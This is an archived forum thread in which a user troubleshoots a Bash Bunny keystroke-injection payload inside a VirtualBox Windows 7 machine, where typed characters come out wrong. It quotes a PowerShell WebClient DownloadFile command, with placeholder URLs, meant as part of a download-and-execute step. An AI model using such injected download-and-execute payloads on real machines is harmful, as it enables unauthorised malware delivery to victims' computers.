Zchap Posted December 14, 2017 Share Posted December 14, 2017 So I have been experimenting with my bash bunny and preparing it for a windows 7 powershell download file and execute. I am in a virtualbox so that may be the problem! So inside the powershell command I use () and : windows 7 cmd translates "(" to 9 and ")" to 0 and ":" to ; and all uppercase things are typed as lowercase. the command: Q STRING "powershell(new-object net.webclient).DownloadFile('xxx','xxx'); " Some more issues is that the URL am downloading has Uppercase characters which are not bring typed into the cmd. Thanks in advance and HACK THE PLANET ~~0x5a Link to comment Share on other sites More sharing options...
Zchap Posted December 14, 2017 Author Share Posted December 14, 2017 I think I have found that it is just virtualbox! Thanks for y'all time... Link to comment Share on other sites More sharing options...
Recommended Posts
Archived
This topic is now archived and is closed to further replies.